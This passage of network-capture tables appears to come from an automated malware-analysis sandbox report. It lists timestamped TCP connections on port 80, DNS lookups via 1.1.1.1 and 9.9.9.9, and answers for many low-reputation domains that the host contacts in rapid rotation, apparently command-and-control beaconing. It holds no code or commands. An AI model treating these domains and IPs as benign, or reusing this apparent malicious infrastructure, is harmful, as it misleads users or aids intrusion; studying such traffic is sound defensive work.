                                                                                                                                                                Oct 9, 2024 13:04:55.775405884 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.775568008 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:55.775600910 CEST804986023.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:55.775851011 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:56.924578905 CEST4986080192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:57.942774057 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.037611961 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.037802935 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.045490026 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.139523983 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.270699024 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271025896 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271042109 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:58.271234989 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.273677111 CEST4986180192.168.11.3023.227.38.74
                                                                                                                                                                Oct 9, 2024 13:04:58.367881060 CEST804986123.227.38.74192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.620017052 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.720840931 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.720980883 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.731158972 CEST4986280192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:03.830775023 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.831685066 CEST804986284.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.253648043 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.353965998 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.354146957 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.366782904 CEST4986380192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:06.466675043 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:06.466876984 CEST804986384.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:08.893558025 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:08.993360043 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:08.993566990 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.004106998 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.004156113 CEST4986480192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:09.104773045 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:09.105194092 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:09.105302095 CEST804986484.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.536875010 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.637892008 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.638192892 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.646508932 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.746632099 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747112989 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747235060 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747361898 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747375965 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747483969 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747498989 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747512102 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747519016 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747571945 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747582912 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:11.747689009 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747689009 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.747905016 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.752340078 CEST4986580192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:05:11.852082968 CEST804986584.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:16.985682964 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.139560938 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.139806986 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.149975061 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:17.303585052 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304627895 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304641008 CEST804986654.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:17.304786921 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:18.654005051 CEST4986680192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.672339916 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.826569080 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.826716900 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.835942030 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:19.989649057 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990580082 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990592957 CEST804986754.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:19.990696907 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:21.340874910 CEST4986780192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.359317064 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.513144970 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.513318062 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.528934002 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.528984070 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:22.682487011 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.682718992 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.683959007 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.683969021 CEST804986854.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:22.684123039 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:24.043457031 CEST4986880192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.061844110 CEST4986980192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.215939045 CEST804986954.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:25.216078043 CEST4986980192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.222970009 CEST4986980192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.376543999 CEST804986954.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:25.377521992 CEST804986954.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:25.377600908 CEST804986954.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:25.377800941 CEST4986980192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.380426884 CEST4986980192.168.11.3054.67.42.145
                                                                                                                                                                Oct 9, 2024 13:05:25.533973932 CEST804986954.67.42.145192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:30.497010946 CEST4987080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:30.596411943 CEST80498703.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:30.596553087 CEST4987080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:30.606779099 CEST4987080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:30.706082106 CEST80498703.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:30.707818031 CEST80498703.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:30.708028078 CEST4987080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:32.119816065 CEST4987080192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:32.219410896 CEST80498703.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:33.137833118 CEST4987180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:33.237323999 CEST80498713.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:33.237495899 CEST4987180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:33.247468948 CEST4987180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:33.346816063 CEST80498713.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:33.347982883 CEST80498713.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:33.348112106 CEST4987180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:34.759728909 CEST4987180192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:34.859071016 CEST80498713.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.780807972 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:35.880162954 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.880348921 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:35.897790909 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:35.897815943 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:35.997066975 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.997226000 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.997344971 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.999044895 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:35.999197960 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:37.399816990 CEST4987280192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:37.499239922 CEST80498723.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:38.418297052 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:38.517636061 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:38.517771959 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:38.525166035 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:38.624464035 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:45.583575010 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:45.583590031 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:45.583957911 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:45.586532116 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:45.587955952 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:45.588166952 CEST4987380192.168.11.303.33.130.190
                                                                                                                                                                Oct 9, 2024 13:05:45.686213970 CEST80498733.33.130.190192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:05.140995026 CEST4987880192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:05.241096020 CEST804987884.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:05.241221905 CEST4987880192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:05.253164053 CEST4987880192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:05.352765083 CEST804987884.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:05.353545904 CEST804987884.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:07.786019087 CEST4987980192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:07.887741089 CEST804987984.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:07.887938023 CEST4987980192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:07.898647070 CEST4987980192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:08.000700951 CEST804987984.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:08.000721931 CEST804987984.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:10.426482916 CEST4988080192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:10.526803017 CEST804988084.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:10.527010918 CEST4988080192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:10.537930965 CEST4988080192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:10.537978888 CEST4988080192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:10.637928963 CEST804988084.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:10.639457941 CEST804988084.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:10.639555931 CEST804988084.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.066106081 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.165855885 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.166047096 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.173218966 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.272891998 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.273905993 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.273993969 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274051905 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274072886 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274091959 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274113894 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274133921 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274240971 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274257898 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:13.274403095 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.274621010 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.278508902 CEST4988180192.168.11.3084.32.84.32
                                                                                                                                                                Oct 9, 2024 13:06:13.378278017 CEST804988184.32.84.32192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:21.374988079 CEST4988280192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:06:21.586558104 CEST804988285.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:21.586735964 CEST4988280192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:06:21.594422102 CEST4988280192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:06:21.846458912 CEST804988285.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:07:21.807486057 CEST804988285.159.66.93192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:07:21.807765961 CEST4988280192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:07:21.809689999 CEST4988280192.168.11.3085.159.66.93
                                                                                                                                                                Oct 9, 2024 13:07:22.031970978 CEST804988285.159.66.93192.168.11.30

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 9, 2024 13:01:38.531209946 CEST6032953192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:01:39.074335098 CEST53603291.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:44.520591021 CEST5913953192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:02:44.623275042 CEST53591391.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:02:57.782975912 CEST6004853192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:02:58.795376062 CEST6004853192.168.11.309.9.9.9
                                                                                                                                                                Oct 9, 2024 13:02:59.810645103 CEST6004853192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:03:00.226011992 CEST53600481.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:00.226078033 CEST53600481.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:14.685317993 CEST5573653192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:03:14.801719904 CEST53557361.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:27.932857037 CEST5884453192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:03:28.369038105 CEST53588441.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:42.038948059 CEST5345653192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:03:42.247103930 CEST53534561.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:03:56.285307884 CEST6414653192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:03:56.387984037 CEST53641461.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:09.532552958 CEST6263153192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:04:09.646835089 CEST53626311.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:22.763684988 CEST5190353192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:04:23.014664888 CEST53519031.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:36.291852951 CEST5201853192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:04:36.462719917 CEST53520181.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:04:49.929733992 CEST5236153192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:04:50.028239012 CEST53523611.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:03.286007881 CEST6397153192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:05:03.617819071 CEST53639711.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:16.767235994 CEST5996253192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:05:16.983318090 CEST53599621.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:30.389271975 CEST5334153192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:05:30.494545937 CEST53533411.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:05:50.602797985 CEST5591053192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:05:51.197057962 CEST53559101.1.1.1192.168.11.30
                                                                                                                                                                Oct 9, 2024 13:06:04.803481102 CEST5347353192.168.11.301.1.1.1
                                                                                                                                                                Oct 9, 2024 13:06:05.138211966 CEST53534731.1.1.1192.168.11.30

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Oct 9, 2024 13:01:38.531209946 CEST192.168.11.301.1.1.10x7e36Standard query (0)www.sealofsea.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:44.520591021 CEST192.168.11.301.1.1.10x6a1aStandard query (0)www.firstcry.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:57.782975912 CEST192.168.11.301.1.1.10x9439Standard query (0)www.languyenthuyduyen.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:58.795376062 CEST192.168.11.309.9.9.90x9439Standard query (0)www.languyenthuyduyen.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:59.810645103 CEST192.168.11.301.1.1.10x9439Standard query (0)www.languyenthuyduyen.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:14.685317993 CEST192.168.11.301.1.1.10xa14cStandard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:27.932857037 CEST192.168.11.301.1.1.10xd11cStandard query (0)www.030002304.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:42.038948059 CEST192.168.11.301.1.1.10xfba4Standard query (0)www.doggieradio.netA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:56.285307884 CEST192.168.11.301.1.1.10xb6e1Standard query (0)www.mybartendinglife.clubA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:09.532552958 CEST192.168.11.301.1.1.10x7761Standard query (0)www.ntn.solarA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:22.763684988 CEST192.168.11.301.1.1.10xf1deStandard query (0)www.technew.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:36.291852951 CEST192.168.11.301.1.1.10x1813Standard query (0)www.allpop.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:49.929733992 CEST192.168.11.301.1.1.10xc8cdStandard query (0)www.zingara.lifeA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:03.286007881 CEST192.168.11.301.1.1.10x9ab5Standard query (0)www.thepeatear.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:16.767235994 CEST192.168.11.301.1.1.10x73f6Standard query (0)www.kx507981.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:30.389271975 CEST192.168.11.301.1.1.10xde57Standard query (0)www.teerra.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:50.602797985 CEST192.168.11.301.1.1.10xebffStandard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:06:04.803481102 CEST192.168.11.301.1.1.10x26f1Standard query (0)www.agilizeimob.appA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Oct 9, 2024 13:01:39.074335098 CEST1.1.1.1192.168.11.300x7e36No error (0)www.sealofsea.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:01:39.074335098 CEST1.1.1.1192.168.11.300x7e36No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:01:39.074335098 CEST1.1.1.1192.168.11.300x7e36No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:44.623275042 CEST1.1.1.1192.168.11.300x6a1aNo error (0)www.firstcry.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:02:44.623275042 CEST1.1.1.1192.168.11.300x6a1aNo error (0)www.firstcry.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:00.226011992 CEST1.1.1.1192.168.11.300x9439No error (0)www.languyenthuyduyen.xyz103.255.237.233A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:00.226078033 CEST1.1.1.1192.168.11.300x9439No error (0)www.languyenthuyduyen.xyz103.255.237.233A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:14.801719904 CEST1.1.1.1192.168.11.300xa14cNo error (0)www.bayarcepat19.click104.21.77.69A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:14.801719904 CEST1.1.1.1192.168.11.300xa14cNo error (0)www.bayarcepat19.click172.67.205.38A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:28.369038105 CEST1.1.1.1192.168.11.300xd11cNo error (0)www.030002304.xyz030002304.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:28.369038105 CEST1.1.1.1192.168.11.300xd11cNo error (0)030002304.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:42.247103930 CEST1.1.1.1192.168.11.300xfba4No error (0)www.doggieradio.netdoggieradio.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:42.247103930 CEST1.1.1.1192.168.11.300xfba4No error (0)doggieradio.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:42.247103930 CEST1.1.1.1192.168.11.300xfba4No error (0)doggieradio.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:56.387984037 CEST1.1.1.1192.168.11.300xb6e1No error (0)www.mybartendinglife.clubmybartendinglife.clubCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:56.387984037 CEST1.1.1.1192.168.11.300xb6e1No error (0)mybartendinglife.club3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:03:56.387984037 CEST1.1.1.1192.168.11.300xb6e1No error (0)mybartendinglife.club15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:09.646835089 CEST1.1.1.1192.168.11.300x7761No error (0)www.ntn.solar199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:23.014664888 CEST1.1.1.1192.168.11.300xf1deNo error (0)www.technew.shoptechnew.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:23.014664888 CEST1.1.1.1192.168.11.300xf1deNo error (0)technew.shop45.56.219.238A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:36.462719917 CEST1.1.1.1192.168.11.300x1813No error (0)www.allpop.xyz162.0.238.43A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:50.028239012 CEST1.1.1.1192.168.11.300xc8cdNo error (0)www.zingara.lifeshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:04:50.028239012 CEST1.1.1.1192.168.11.300xc8cdNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:03.617819071 CEST1.1.1.1192.168.11.300x9ab5No error (0)www.thepeatear.onlinethepeatear.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:03.617819071 CEST1.1.1.1192.168.11.300x9ab5No error (0)thepeatear.online84.32.84.32A (IP address)IN (0x0001)false
